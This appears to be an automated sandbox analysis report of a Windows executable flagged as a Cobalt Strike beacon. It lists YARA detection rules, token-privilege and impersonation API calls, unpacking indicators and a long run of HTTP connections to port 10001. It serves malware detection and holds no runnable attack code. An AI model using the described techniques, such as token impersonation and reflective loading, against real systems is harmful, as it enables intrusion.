            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0099FE24 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0099FE24
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A6C98 OpenProcess,TerminateProcess,GetLastError,CloseHandle,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,CloseHandle,htonl,htonl,OpenProcess,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,CloseHandle,CloseHandle,0_2_009A6C98
            Source: 7kSftA4Eoh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 7kSftA4Eoh.exeReversingLabs: Detection: 89%
            Source: 7kSftA4Eoh.exeVirustotal: Detection: 79%
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeUnpacked PE file: 0.2.7kSftA4Eoh.exe.990000.1.unpack
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BC124 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,0_2_009BC124
            Source: 7kSftA4Eoh.exeStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009C515C push 0000006Ah; retf 0_2_009C5174
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_000D0128 push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_000D0294 push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_000D02EB push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_03549B65 push cs; retf 0_2_03549B66
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_03566A42 push ebp; iretd 0_2_03566A43
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_03566A62 push ebp; iretd 0_2_03566A63
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_03566A8B push ebp; iretd 0_2_03566A8C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0354B19F push ebp; iretd 0_2_0354B1A0
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_035497A4 push edi; iretd 0_2_035497A5

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 10001
